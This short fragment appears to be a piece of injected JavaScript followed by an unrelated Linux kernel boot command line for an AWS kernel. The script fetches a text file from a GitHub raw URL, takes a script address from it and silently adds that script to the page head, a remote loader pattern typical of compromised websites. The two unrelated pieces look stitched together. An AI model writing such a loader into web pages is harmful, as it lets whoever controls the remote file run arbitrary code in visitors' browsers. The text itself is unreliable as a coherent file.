;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
BOOT_IMAGE=/boot/vmlinuz-5.4.0-1103-aws root=UUID=c03b791b-60ef-4ae1-82b5-5c9ab6b4d08f ro console=tty1 console=ttyS0 nvme_core.io_timeout=4294967295